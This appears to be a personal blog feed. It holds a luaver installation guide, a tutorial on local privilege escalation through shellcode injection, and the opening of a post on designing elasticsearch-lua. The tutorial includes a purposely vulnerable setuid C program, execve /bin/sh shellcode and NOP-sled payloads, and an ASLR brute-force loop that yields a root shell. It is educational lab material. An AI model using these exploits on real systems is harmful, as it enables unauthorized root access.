<p>Using luaver it is very easy to install Lua, LuaJIT or Luarocks. It works by modifying your environment variables. Hence, every terminal session can have a separate environment.</p>
<blockquote>
<h3 id="installing-luaver">Installing luaver</h3>
</blockquote>
<p>First of all, you would need to install luaver itself.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl https://raw.githubusercontent.com/DhavalKapil/luaver/master/install.sh <span class="nt">-o</span> install.sh <span class="o">&&</span> <span class="nb">.</span> ./install.sh
</code></pre></div></div>
<p>You might need to manually setup a ~/.bashrc or ~/.zshrc file.</p>
<blockquote>
<h3 id="installing-lua">Installing Lua</h3>
</blockquote>
<p>To install lua you can simply specify the version you want to install:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver install 5.3.1 <span class="c"># Installs lua-5.3.1</span>
</code></pre></div></div>
<p>Verify your installation by running:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>lua <span class="nt">-v</span>
</code></pre></div></div>
<p>You might need to install <code class="highlighter-rouge">libreadline-dev</code> as a dependency for lua. To install older 32-bit lua versions on 64-bit machines, you will require some additional header files. You can get them by installing <code class="highlighter-rouge">lib32ncurses5-dev</code>.</p>
<blockquote>
<h3 id="installing-luajit">Installing LuaJIT</h3>
</blockquote>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver install-luajit 2.0.2 <span class="c"># Installs luajit-2.0.2</span>
</code></pre></div></div>
<blockquote>
<h3 id="installing-luarocks">Installing Luarocks</h3>
</blockquote>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver install-luarocks 2.3.0 <span class="c"># Installs luarocks-2.3.0</span>
</code></pre></div></div>
<blockquote>
<h3 id="switching-between-versions">Switching between versions</h3>
</blockquote>
<p>You can easily switch between different versions:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver use 5.3.2 <span class="c"># Switches to lua version 5.3.2</span>
luaver use-luajit 2.0.0 <span class="c"># Switches to luajit version 2.0.0</span>
luaver use-luarocks 2.3.0 <span class="c"># Switches to luarocks version 2.3.0</span>
</code></pre></div></div>
<p>The switch will be instantaneous and without any glitches. Consistency will be maintained between lua and luarocks. Rocks are installed separately for different versions of luarocks and lua.</p>
<blockquote>
<h3 id="setting-default-version">Setting default version</h3>
</blockquote>
<p>You can also set default version of lua, luajit and luarocks that will be active whenever you start a new terminal session.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver set-default 5.3.2 <span class="c"># Set lua-5.3.2 as the default version</span>
luaver set-default-luajit 2.0.0 <span class="c"># Set lua-2.0.0 as the default version</span>
luaver set-default-luarocks 2.3.0 <span class="c"># Set lua-2.3.0 as the default version</span>
</code></pre></div></div>
<blockquote>
<h3 id="listing-all-installed-versions">Listing all installed versions</h3>
</blockquote>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver list <span class="c"># Lists all installed lua versions</span>
luaver list-luajit <span class="c"># Lists all installed luajit versions</span>
luaver list-luarocks <span class="c"># Lists all installed luarocks versions</span>
</code></pre></div></div>
<blockquote>
<h3 id="getting-currently-used-versions-of-lua-luajit-luarocks">Getting currently used versions of Lua, LuaJIT, Luarocks</h3>
</blockquote>
<p>The following command will give you the currently used versions:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver current
</code></pre></div></div>
<p>For complete usage run:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>luaver <span class="nb">help</span>
</code></pre></div></div>
<blockquote>
<h3 id="facing-any-issue">Facing any issue?</h3>
</blockquote>
<p>If you face any issue don’t hesitate to <a href="https://github.com/DhavalKapil/luaver/issues">file an issue</a> on the Github repository.</p>
<blockquote>
<h3 id="any-suggestions-improvements">Any suggestions, improvements?</h3>
</blockquote>
<p>luaver is still in its early stages. Feel free to submit a <a href="https://github.com/DhavalKapil/luaver/pulls">pull request</a>! However if you are planning on some big thing, do <a href="https://github.com/DhavalKapil/luaver/issues/new">discuss</a> it beforehand.</p>
Shellcode Injection2015-12-26T00:00:00+00:00https://dhavalkapil.com/blogs/Shellcode-Injection<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>Here I am going to demonstrate how to gain shell access by overflowing a vulnerable buffer. I shall show it with both ASLR disabled as well as ASLR enabled(for those who don’t know about ASLR, I’ll come to it soon). This post is in continuation with ‘<a href="/blogs/Buffer-Overflow-Exploit/">Buffer Overflow Exploit</a>’, which I wrote earlier. You need not go through it if you’re familiar with it.</p>
<blockquote>
<h3 id="prerequisites">Prerequisites:</h3>
</blockquote>
<p>I expect you to have some basic knowledge about C, gcc, command line and x86 assembly. There are plenty of online sources available for them. Apart from that, you should know about the memory layout of a C program and some idea about overflowing the buffer. In case you are not familiar, I suggest reading my earlier <a href="/blogs/Buffer-Overflow-Exploit/">blog</a> post.</p>
<blockquote>
<h3 id="scenario">Scenario:</h3>
</blockquote>
<p>You have access to a system with an executable binary that is owned by root, has the <code class="highlighter-rouge">suid</code> bit set, and is vulnerable to buffer overflow. We will now exploit it to gain shell access. To learn more about the <code class="highlighter-rouge">suid</code> bit see <a href="http://www.linuxnix.com/suid-set-suid-linuxunix/">this</a></p>
<blockquote>
<h3 id="setting-up-the-environment">Setting up the environment:</h3>
</blockquote>
<ol>
<li>
<p>First create a user <code class="highlighter-rouge">test</code> without root privilages:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> adduser <span class="nb">test</span>
</code></pre></div> </div>
</li>
<li>
<p>Create <code class="highlighter-rouge">vuln.c</code> in the home directory for <code class="highlighter-rouge">test</code> user.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
#include <string.h>
</span>
<span class="kt">void</span> <span class="nf">func</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span>
<span class="n">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Welcome %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
<span class="n">func</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div> </div>
<p><a href="/assets/files/Shellcode-Injection/vuln.c">Here</a> is the link to the above mentioned code.</p>
<p><em>Note: You might need <code class="highlighter-rouge">sudo</code> while accessing the home directory for <code class="highlighter-rouge">test</code> user.</em></p>
</li>
<li>
<p>Let’s compile it.</p>
<blockquote>
<p><em>For 32 bit systems</em></p>
</blockquote>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> gcc vuln.c <span class="nt">-o</span> vuln <span class="nt">-fno-stack-protector</span> <span class="nt">-z</span> execstack
</code></pre></div> </div>
<blockquote>
<p><em>For 64 bit systems</em></p>
</blockquote>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> gcc vuln.c <span class="nt">-o</span> vuln <span class="nt">-fno-stack-protector</span> <span class="nt">-m32</span> <span class="nt">-z</span> execstack
</code></pre></div> </div>
<p><code class="highlighter-rouge">-fno-stack-protector</code> disabled the stack protection. Smashing the stack is now allowed. <code class="highlighter-rouge">-m32</code> made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32-bit binaries on 64-bit machines. <code class="highlighter-rouge">-z execstack</code> makes the stack executable(we’re going to run the shellcode right?). You can download the binary generated on my machine <a href="/assets/files/Shellcode-Injection/vuln">here</a>.</p>
</li>
<li>
<p>Setting up permissions</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> chown root:test vuln
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> chmod 550 vuln
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> chmod u+s vuln
</code></pre></div> </div>
<p>Confirm by listing the file, <code class="highlighter-rouge">ls -l vuln</code></p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">-r-sr-x---</span> 1 root <span class="nb">test </span>7392 Dec 22 00:27 vuln
</code></pre></div> </div>
</li>
</ol>
<blockquote>
<h3 id="what-is-aslr">What is ASLR?</h3>
</blockquote>
<p>From <a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">Wikipedia</a>:</p>
<blockquote>
<p>Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks. ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap, and libraries.</p>
</blockquote>
<p>In short, when ASLR is turned on, the addresses of the stack, etc will be randomized. This causes a lot of difficulty in predicting addresses while exploitation.</p>
<p>To disable ASLR:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"0"</span> | <span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> dd <span class="nv">of</span><span class="o">=</span>/proc/sys/kernel/randomize_va_space
</code></pre></div></div>
<p>To enable ASLR:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"2"</span> | <span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> dd <span class="nv">of</span><span class="o">=</span>/proc/sys/kernel/randomize_va_space
</code></pre></div></div>
<blockquote>
<h2 id="shellcode-injection">Shellcode Injection</h2>
</blockquote>
<p>In the first part, we’ll turn off ASLR and then approach this problem. After disabling ASLR, log into <code class="highlighter-rouge">test</code> user. You can switch user on terminal using:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>su <span class="nb">test</span>
</code></pre></div></div>
<p>Clearly there is a vulnerability in <code class="highlighter-rouge">vuln.c</code>. The <code class="highlighter-rouge">strcpy</code> function does not specify a maximum length while copying. Let’s disassemble using <code class="highlighter-rouge">objdump</code> and see what we can find.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-d</span> <span class="nt">-M</span> intel vuln
</code></pre></div></div>
<p>This is how the it looks like.(It may not be the same in your case).</p>
<p><img src="/assets/images/Shellcode-Injection/disassembly.png" alt="Disassembly of func and main" /></p>
<p>It can be observed that <code class="highlighter-rouge">buf</code> lies at <code class="highlighter-rouge">ebp - 0x6c</code>. 0x6c is 108 in decimal. Hence, 108 bytes are allocated for buf in the stack, the next 4 bytes would be the saved <code class="highlighter-rouge">ebp</code> pointer of the previous stack frame, and the next 4 bytes will be the return address.</p>
<p>Shellcode injection consists of the following main parts:</p>
<ol>
<li>
<p>The shellcode that is to be injected is <strong>crafted</strong>.</p>
</li>
<li>
<p>A <strong>possible place is found</strong> where we can insert the shellcode.</p>
</li>
<li>
<p>The program is exploited to <strong>transfer execution flow</strong> to the location where the shellcode was inserted.</p>
</li>
</ol>
<p>We’ll deal with each of the steps briefly:</p>
<blockquote>
<h3 id="crafting-shellcode">Crafting Shellcode</h3>
</blockquote>
<p>Crafting shellcode is in itself a big topic to cover here. I shall take it in brief. We will create a shellcode that spawns a shell. First create <code class="highlighter-rouge">shellcode.nasm</code> with the following code:</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">xor</span> <span class="n">eax</span><span class="p">,</span> <span class="n">eax</span> <span class="c">;Clearing eax register</span>
<span class="k">push</span> <span class="n">eax</span> <span class="c">;Pushing NULL bytes</span>
<span class="k">push</span> <span class="mh">0x68732f2f</span> <span class="c">;Pushing //sh</span>
<span class="k">push</span> <span class="mh">0x6e69622f</span> <span class="c">;Pushing /bin</span>
<span class="k">mov</span> <span class="n">ebx</span><span class="p">,</span> <span class="n">esp</span> <span class="c">;ebx now has address of /bin//sh</span>
<span class="k">push</span> <span class="n">eax</span> <span class="c">;Pushing NULL byte</span>
<span class="k">mov</span> <span class="n">edx</span><span class="p">,</span> <span class="n">esp</span> <span class="c">;edx now has address of NULL byte</span>
<span class="k">push</span> <span class="n">ebx</span> <span class="c">;Pushing address of /bin//sh</span>
<span class="k">mov</span> <span class="n">ecx</span><span class="p">,</span> <span class="n">esp</span> <span class="c">;ecx now has address of address</span>
<span class="c">;of /bin//sh byte</span>
<span class="k">mov</span> <span class="n">al</span><span class="p">,</span> <span class="mi">11</span> <span class="c">;syscall number of execve is 11</span>
<span class="k">int</span> <span class="mh">0x80</span> <span class="c">;Make the system call</span>
</code></pre></div></div>
<p><a href="/assets/files/Shellcode-Injection/shellcode.asm">Here</a> is the link to the above mentioned code.</p>
<p>To compile it use <code class="highlighter-rouge">nasm</code>:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nasm <span class="nt">-f</span> elf shellcode.asm
</code></pre></div></div>
<p>Use objdump to get the shellcode bytes:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump <span class="nt">-d</span> <span class="nt">-M</span> intel shellcode.o
</code></pre></div></div>
<p><img src="/assets/images/Shellcode-Injection/shellcode-dump.png" alt="Disassembly of shellcode" /></p>
<p>Extracting the bytes gives us the shellcode:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
</code></pre></div></div>
<blockquote>
<h3 id="finding-a-possible-place-to-inject-shellcode">Finding a possible place to inject shellcode</h3>
</blockquote>
<p>In this example <code class="highlighter-rouge">buf</code> seems to be the perfect place. We can insert the shellcode by passing it inside the first parameter while running <code class="highlighter-rouge">vuln</code>. But how do we know what address <code class="highlighter-rouge">buf</code> will be loaded in stack? That’s where <code class="highlighter-rouge">gdb</code> will help us. As ASLR is disabled we are sure that no matter how many times the binary is run, the address of <code class="highlighter-rouge">buf</code> will not change.</p>
<p>From the official website of <a href="https://www.gnu.org/software/gdb/">GDB</a></p>
<blockquote>
<p>GDB, the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes – or what another program was doing at the moment it crashed.</p>
</blockquote>
<p>Basically, with <code class="highlighter-rouge">gdb</code> you can run a process, stop it at any given point, examine the memory/etc. It is good to get acquainted with it, however, I shall be using a subset of its features.</p>
<p>So let’s run <code class="highlighter-rouge">vuln</code> using gdb:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vampire@linux:/home/test<span class="nv">$ </span>gdb <span class="nt">-q</span> vuln
Reading symbols from vuln...<span class="o">(</span>no debugging symbols found<span class="o">)</span>...done.
<span class="o">(</span>gdb<span class="o">)</span> <span class="nb">break </span>func
Breakpoint 1 at 0x8048456
<span class="o">(</span>gdb<span class="o">)</span> run <span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A"*116'</span><span class="k">)</span>
Starting program: /home/test/vuln <span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A"*116'</span><span class="k">)</span>
Breakpoint 1, 0x08048456 <span class="k">in </span>func <span class="o">()</span>
<span class="o">(</span>gdb<span class="o">)</span> print <span class="nv">$ebp</span>
<span class="nv">$1</span> <span class="o">=</span> <span class="o">(</span>void <span class="k">*</span><span class="o">)</span> 0xffffce78
<span class="o">(</span>gdb<span class="o">)</span> print <span class="nv">$ebp</span> - 0x6c
<span class="nv">$2</span> <span class="o">=</span> <span class="o">(</span>void <span class="k">*</span><span class="o">)</span> 0xffffce0c
</code></pre></div></div>
<p>I set a breakpoint at the <code class="highlighter-rouge">func</code> function. I then started the binary with a payload of length 116 as the argument. Printing the address <code class="highlighter-rouge">ebp - 0x6c</code> shows that <code class="highlighter-rouge">buf</code> was located at <code class="highlighter-rouge">0xffffce0c</code>. However this need not be the address of <code class="highlighter-rouge">buf</code> when we run the program outside of <code class="highlighter-rouge">gdb</code>. This is because things like environment variables and the name of the program along with arguments are also pushed on the stack. Although, the stack starts at the same address(because of ASLR disabled), the difference in the method of running the program will result in the difference of the address of <code class="highlighter-rouge">buf</code>. This difference will be around a few bytes and I will later demonstrate how to take care of it.</p>
<p><strong>Note</strong>: The length of the payload will have an effect on the location of <code class="highlighter-rouge">buf</code> as the payload itself is also pushed on the stack(it is part of the arguments). I used one of length 116, which will be the length of the final payload that we’ll be passing. In case, you change the length of your payload dramatically, always remember to find the address again.</p>
<blockquote>
<h3 id="transfering-execution-flow-of-the-program-to-the-inserted-shellcode">Transfering execution flow of the program to the inserted shellcode</h3>
</blockquote>
<p>This is the easiest part. We have the shellcode in memory and know its address(with an error of a few bytes). We have already found out that <code class="highlighter-rouge">vuln</code> is vulnerable to buffer overflow and we can modify the return address for function <code class="highlighter-rouge">func</code>.</p>
<blockquote>
<h3 id="crafting-payload">Crafting payload</h3>
</blockquote>
<p>Let’s insert the shellcode at the end of the argument string so its address is equal to the address of <code class="highlighter-rouge">buf</code> + some length. Here’s our shellcode:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
</code></pre></div></div>
<ul>
<li>
<p>Length of shellcode = 25 bytes</p>
</li>
<li>
<p>It is also known that return address starts after the first 112 bytes of <code class="highlighter-rouge">buf</code></p>
</li>
<li>
<p>We’ll fill the first 40 bytes with NOP instructions</p>
</li>
</ul>
<blockquote>
<h4 id="nop-sled">NOP Sled</h4>
</blockquote>
<p>NOP Sled is a sequence of NOP (no-operation) instructions meant to “slide” the CPU’s instruction execution flow to its final, desired, destination whenever the program branches to a memory address anywhere on the sled. Basically, whenever the CPU sees a NOP instruction, it slides down to the next instruction.</p>
<p>The reason for inserting a NOP sled before the shellcode is that now we can transfer execution flow to anyplace within these 40 bytes. The processor will keep on executing the NOP instructions until it finds the shellcode. We need not know the exact address of the shellcode. This takes care of the earlier mentioned problem of not knowing the address of <code class="highlighter-rouge">buf</code> exactly.</p>
<p>We will make the processor jump to the address of <code class="highlighter-rouge">buf</code>(taken from gdb’s output) + 20 bytes to get somewhere in the middle of the NOP sled.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0xffffce0c + 20 = 0xffffce20
</code></pre></div></div>
<p>We can fill the rest 47(112 - 25 - 40) bytes with random data, say the ‘A’ character.</p>
<p>Final payload structure:</p>
<p>[40 bytes of NOP - sled] [25 bytes of shellcode] [47 times ‘A’ will occupy 49 bytes] [4 bytes pointing in the middle of the NOP - sled: 0xffffce16]</p>
<p>So let’s try to execute it:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">test</span>@linux ~ <span class="nv">$ </span>./vuln <span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "\x90"*40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*47 + "\x20\xce\xff\xff"'</span><span class="k">)</span>
Welcome ����������������������������������������j
X�Rhn/shh//bi��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4���
<span class="c"># whoami</span>
root
</code></pre></div></div>
<p>Congratulations! We’ve got root access.</p>
<p><strong>Note</strong>: In case you segmentation fault, try changing the return address by +- 40 a few times.</p>
<p>To summarize, we overflowed the buffer and modified the return address to point near the start of the <code class="highlighter-rouge">buffer</code> in the stack. The <code class="highlighter-rouge">buffer</code> itself started with a NOP sled followed by shellcode which got executed. Keep in mind that we did all this with ASLR turned off. Which means that the start of the stack wasn’t randomized each time the program was executed. This enabled us to first run the program in <code class="highlighter-rouge">gdb</code> to know the address of <code class="highlighter-rouge">buffer</code>. Make sure you’ve understood everything till here. Now we shall be going to the exciting part!</p>
<blockquote>
<h2 id="shellcode-injection-with-aslr">Shellcode Injection with ASLR</h2>
</blockquote>
<p>You can turn ASLR on and try to execute our earlier exploit. A great chance you wouldn’t be able to run it. So how do we approach now? To begin, let’s first try to inspect a few things. Let’s create a program to just print the address of its variable which is stored on the stack.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">a</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&</span><span class="n">a</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><a href="/assets/files/Shellcode-Injection/stack_addr.c">Here</a> is the link to the above mentioned code.</p>
<p>Compile it to a 32 bit binary as before. This is my output for a few test runs:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffe918bc
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffdc367c
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffeaf37c
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffc31ddc
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffc6a56c
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffbcf9bc
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffbcf02c
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xffbf1dcc
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xfffe386c
<span class="nb">test</span>@linux ~ <span class="nv">$ </span>./stack_addr
0xff9547cc
</code></pre></div></div>
<p>It seems that every time the variable is loaded at different addresses in the stack. The address can be represented as <code class="highlighter-rouge">0xffXXXXXc</code>(where X is any hexadecimal digit). With some more testing, it can be seen that even the last half-byte(‘c’ over here) depends on the relative location of the variable inside the program. So in general, the address of a variable on the stack is <code class="highlighter-rouge">0xffXXXXXX</code>. This amounts to 16^6 = 16777216 possible cases. It can be easily seen that the earlier method, mentioned above to exploit the stack, will now work with only 40/16777216 probability(40 is the length of NOP - sled, if any of those NOP bytes happen to be where the modified return address points, the shellcode will be executed). That means on an average, 1 in every 419431 runs, the shellcode will be executed.</p>
<p>Now that is quite depressing. The key point to note here is that the probability depended on the <strong>length of the NOP sled</strong>. Clearly by increasing its length we can execute our shellcode with greater probability. However, the length of the buffer is limited. We can’t get much increase in probability even by using the full buffer. Looks as if we need to find some other place to inject our nop sled + shellcode(i.e. modifying the second step in the three steps listed above).</p>
<p>It turns out that we have another candidate - <strong>environment variable</strong>!</p>
<p>We could insert the nop sled + shellcode in an environment variable. Keep in mind that all the environment variables themselves are loaded on the stack. Moreover, the size limit of environment variables is huge. It turns out that on my machine I can create a NOP sled of 100,000!</p>
<p>So lets create an environment variable <code class="highlighter-rouge">SHELLCODE</code>:</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">SHELLCODE</span><span class="o">=</span><span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'</span><span class="k">)</span>
</code></pre></div></div>
<p>Now let’s choose any random address somewhere in the middle, say <code class="highlighter-rouge">0xff881111</code>. Now run <code class="highlighter-rouge">vuln</code> program overriding the return address with this. To increase our chances of hittinh lets do this repeatedly using a <code class="highlighter-rouge">for</code> loop.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">test</span>@linux ~ <span class="nv">$ </span><span class="k">for </span>i <span class="k">in</span> <span class="o">{</span>1..100<span class="o">}</span><span class="p">;</span> <span class="k">do</span> ./vuln <span class="k">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A"*112 + "\x11\x11\x88\xff"'</span><span class="k">)</span><span class="p">;</span> <span class="k">done</span>
</code></pre></div></div>
<p>After a few runs, we get shell access!</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Segmentation fault
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
<span class="c"># whoami</span>
root
<span class="c">#</span>
</code></pre></div></div>
<p>Sweet, isn’t it?</p>
<p>Even if your machine does not support as big a NOP sled as I used, use binary search to choose the maximum allowed. I’ve listed the probabilities of various sizes:</p>
<table>
<thead>
<tr>
<th style="text-align: center">Size of NOP Sled</th>
<th style="text-align: center">Probability of shellcode execution</th>
<th style="text-align: center">Average no of tries needed to succeed once</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: center">40</td>
<td style="text-align: center">2.38418579102e-06</td>
<td style="text-align: center">419431</td>
</tr>
<tr>
<td style="text-align: center">100</td>
<td style="text-align: center">5.96046447754e-06</td>
<td style="text-align: center">167773</td>
</tr>
<tr>
<td style="text-align: center">500</td>
<td style="text-align: center">2.98023223877e-05</td>
<td style="text-align: center">33555</td>
</tr>
<tr>
<td style="text-align: center">1000</td>
<td style="text-align: center">5.96046447754e-05</td>
<td style="text-align: center">16778</td>
</tr>
<tr>
<td style="text-align: center">10000</td>
<td style="text-align: center">5.96046447754e-04</td>
<td style="text-align: center">1678</td>
</tr>
<tr>
<td style="text-align: center">100000</td>
<td style="text-align: center">5.96046447754e-03</td>
<td style="text-align: center">168</td>
</tr>
</tbody>
</table>
<p>In this blog I’ve used the return address(on the stack) to control the execution flow of the program. There are many other possible places for attacking.</p>
<p><strong>Note</strong>: I did a talk and a demo about Shellcode Injection in my college as part of ‘Recent trends in Network Security’. Slides can be found <a href="https://speakerdeck.com/dhavalkapil/shellcode-injection">here</a>.</p>
Elasticsearch Lua2015-10-07T00:00:00+00:00https://dhavalkapil.com/blogs/Elasticsearch-Lua<p>This post is about <a href="https://github.com/DhavalKapil/elasticsearch-lua">elasticsearch-lua</a>. I developed it during the summer of 2015 as part of <a href="https://www.google-melange.com/gsoc/homepage/google/gsoc2015">GSoC(Google Summer of Code) 2015</a>. Here I shall describe the reasons for various software design decisions that I took.</p>
<p><strong>Note: This post is not about ‘How to use elasticsearch-lua’. I would recommend you to go through the <a href="https://github.com/DhavalKapil/elasticsearch-lua">README</a> and the <a href="https://dhavalkapil.com/elasticsearch-lua/docs/classes/Client.html">documentation</a> on how to use elasticsearch-lua.</strong></p>
<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>Elasticsearch is a very powerful and scalable search engine. It provides a REST API accessed through JSON format. There are many clients written in different languages (e.g. php, js, python, ruby) that wrap around the REST API to provide an abstraction. However, there was no client for Lua. My project aimed to create an elasticsearch client for Lua developers.</p>
<p>As part of GSOC-2015 I worked with the <a href="http://www.lua.inf.puc-rio.br/">LabLua</a> “organization”, a research laboratory at PUC-Rio dedicated to research about programming languages, especially Lua, and my mentor <a href="http://www.inf.puc-rio.br/~pmusa">Pablo Musa</a>.</p>
<blockquote>
<h2 id="motivation">Motivation</h2>
</blockquote>
<p>I develop applications under the student group <a href="http://sdslabs.co/">SDSLabs</a>. One of our applications had a text-search feature on a large dataset. Using <code class="highlighter-rouge">Elasticsearch</code> in the backend, greatly enhanced its performance. Seeing its potential, I was greatly interested in it.</p>
<p>Later when I read about the <code class="highlighter-rouge">elasticsearch-lua</code> project under GSoC I was quite excited. I was getting the opportunity to develop a client for <code class="highlighter-rouge">elasticsearch</code> in <code class="highlighter-rouge">Lua</code>. Clearly it had a lot of uses for the developers using the Lua language. My interest in software networking also motivated me to work on this project.</p>
<blockquote>
<h2 id="developing-elasticsearch-lua">Developing elasticsearch-lua</h2>
</blockquote>
